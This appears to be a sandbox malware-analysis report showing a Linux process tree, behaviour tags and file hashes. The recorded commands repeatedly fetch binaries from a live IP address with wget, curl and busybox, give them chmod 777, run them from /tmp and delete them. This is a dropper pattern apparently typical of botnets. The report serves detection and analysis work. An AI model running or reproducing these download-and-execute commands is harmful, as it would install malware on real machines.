/bin/chmodchmod 777 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir./EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵PID:901
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵PID:902
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵PID:904
-
-
/bin/chmodchmod 777 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C./BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵PID:907
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵PID:908
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97